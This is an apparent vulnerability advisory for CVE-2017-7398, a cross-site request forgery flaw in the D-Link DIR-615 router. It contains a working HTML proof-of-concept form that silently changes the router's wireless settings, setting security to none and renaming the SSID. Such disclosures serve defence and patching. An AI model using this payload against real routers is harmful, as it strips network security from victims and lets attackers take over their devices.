扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 |
Title: ==== D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability Credit: ====== Name: Pratik S. Shah Reference: ========= CVE Details: CVE-2017-7398. Date: ==== 1-04-2017 Vendor: ====== D-Link wireless router Product: ======= DIR-615 http://www.dlink.co.in/products/?pid=678 Affected Version: ============= Hardware: T1 , Firmware: 20.09 Abstract: ======= This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated. Attack Type: =================== Remote Details: ========= CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device. Proof Of Concept: ================ 1) User login to D-link DIR 615 wireless router 2) User visits the attacker's malicious web page (DlinkCSRF.html) 3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None This is the CSRF POC for changing the Security option from WPA2 to None( Parameter: Method) Attacker can also tamper following parameters hiddenSSID SSID Passwords for all the applicable security options <html> <!-- CSRF PoC - D-link DIR 615 HW:T1 FW:20.09--> <body> <form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST"> <input type="hidden" name="domain" value="1" /> <input type="hidden" name="hiddenSSID" value="on" /> <input type="hidden" name="ssid" value=“Hacked” /> <input type="hidden" name="band" value="10" /> <input type="hidden" name="chan" value="0" /> <input type="hidden" name="chanwid" value="1" /> <input type="hidden" name="txRate" value="0" /> <input type="hidden" name="method_cur" value="6" /> <input type="hidden" name="method" value="0" /> <input type="hidden" name="authType" value="1" /> <input type="hidden" name="length" value="1" /> <input type="hidden" name="format" value="2" /> <input type="hidden" name="defaultTxKeyId" value="1" /> <input type="hidden" name="key1" value="0000000000" /> <input type="hidden" name="pskFormat" value="0" /> <input type="hidden" name="pskValue" value=“CSRF@test” /> <input type="hidden" name="checkWPS2" value="1" /> <input type="hidden" name="save" value="Apply" /> <input type="hidden" name="basicrates" value="15" /> <input type="hidden" name="operrates" value="4095" /> <input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" /> <input type="submit" value="Submit request" /> </form> </body> </html> Disclosure Timeline: ====================================== Vendor Notification: 6th March 2017 |
体验盒子
